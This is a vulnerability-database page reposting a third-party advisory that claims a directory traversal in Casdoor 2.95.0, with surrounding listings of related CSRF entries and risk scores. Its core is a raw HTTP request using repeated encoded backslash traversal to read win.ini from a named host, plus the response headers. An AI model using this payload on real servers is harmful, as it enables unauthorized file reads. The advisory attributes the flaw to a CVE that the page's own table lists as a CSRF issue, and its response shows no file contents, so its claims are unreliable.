Vulners
Lucene search
๐ Casdoor 2.95.0 Directory Traversal
๐๏ธย 11 Dec 2025ย 00:00:00Reported byย indoushkaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 148ย Views
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | CVE-2023-34927 | 22 Jun 202313:15 | โ | attackerkb |
 | Casdoor ่ทจ็ซ่ฏทๆฑไผช้ ๆผๆด | 22 Jun 202300:00 | โ | cnnvd |
 | CVE-2023-34927 | 22 Jun 202300:00 | โ | cve |
 | CVE-2023-34927 | 22 Jun 202300:00 | โ | cvelist |
 | Casdoor < v1.331.0 - '/api/set-password' CSRF | 2 Apr 202400:00 | โ | exploitdb |
| Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF) | 16 Sep 202500:00 | โ | exploitdb |
| Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF) | 29 Oct 202500:00 | โ | exploitdb |
 | EUVD-2023-1883 | 3 Oct 202520:07 | โ | euvd |
 | Casdoor Cross-Site Request Forgery vulnerability | 22 Jun 202315:30 | โ | github |
 | CVE-2023-34927 | 22 Jun 202313:15 | โ | nvd |
10
=============================================================================================================================================
| # Title : Casdoor 2.95.0 Directory Traversal |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://casdoor.com |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211122/ & CVE-2023-34927
[+] Summary : The vulnerability confirmed here is a Directory Traversal affecting an application running on Casdoor 2.95.0
[+] POC :
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host: door.casdoor.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 92
Content-Type: text/plain; charset=utf-8
Date: Sat, 06 Dec 2025 14:35:45 GMT
Last-Modified: Sat, 08 May 2021 08:18:31 GMT
Server: beegoServer:1.12.3
Set-Cookie: casdoor_session_id=891e4bf2d09b3240b7d1dd82ceba5c0f; Path=/; Expires=Mon, 05 Jan 2026 14:35:45 GMT; Max-Age=2592000; HttpOnly
Original-Content-Encoding: gzip
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Dec 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.16.5
EPSS0.00404
SSVC